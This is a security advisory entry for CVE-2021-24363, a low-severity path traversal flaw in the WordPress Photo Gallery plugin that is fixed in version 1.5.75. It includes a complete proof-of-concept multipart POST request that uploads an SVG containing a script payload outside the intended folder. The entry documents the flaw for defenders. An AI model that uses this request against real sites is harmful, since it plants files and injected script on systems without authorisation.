WordPress Plugin Vulnerabilities

Photo Gallery < 1.5.75 - File Upload Path Traversal

Description

The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images/SVG anywhere in the filesystem via a path traversal vector

Proof of Concept

The below requests will put the xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/

POST /wp-admin/admin-ajax.php?bwg_nonce=4ef81877b0&action=bwg_UploadHandler&dir=/../ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------61502566032120876251044562165
Content-Length: 1841
Connection: close
Cookie: [high privilege user, such as admin]

-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="bwg_nonce"

d0b8d99404
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_width"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_thumb_height"

500
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_width"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="upload_img_height"

1200
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="extensions"

jpg,jpeg,png,gif,svg
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="callback"

bwg_add_image
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_by"

date_modified
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="sort_order"

desc
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="items_view"

thumbs
-----------------------------61502566032120876251044562165
Content-Disposition: form-data; name="files[]"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
	<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
	<script type="text/javascript">alert(document.domain);</script>
</svg>

-----------------------------61502566032120876251044562165--

Affects Plugins

Plugin icon
photo-gallery
Fixed in 1.5.75

References

CVE
CVE-2021-24363

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
2.7 (low)

Miscellaneous

Original Researcher
avolume
Verified
Yes
WPVDB ID
1628935f-1d7d-4609-b7a9-e5526499c974

Timeline

Publicly Published
2021-07-18 (about 2 years ago)
Added
2021-07-19 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2022-05-16
Title
User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal
Published
2014-08-01
Title
Advanced Dewplayer <= 1.2 - download-file.php dew_file Parameter Traversal Arbitrary File Access
Published
2021-09-27
Title
Contact Forms - Drag & Drop Contact Form Builder <= 1.0.5 - Admin+ Arbitrary System File Read
Published
2022-09-14
Title
Enable Media Replace < 4.0.0 - Admin+ Path Traversal
Published
2021-07-05
Title
Haxcan <= 1.0.0 - Arbitrary File Access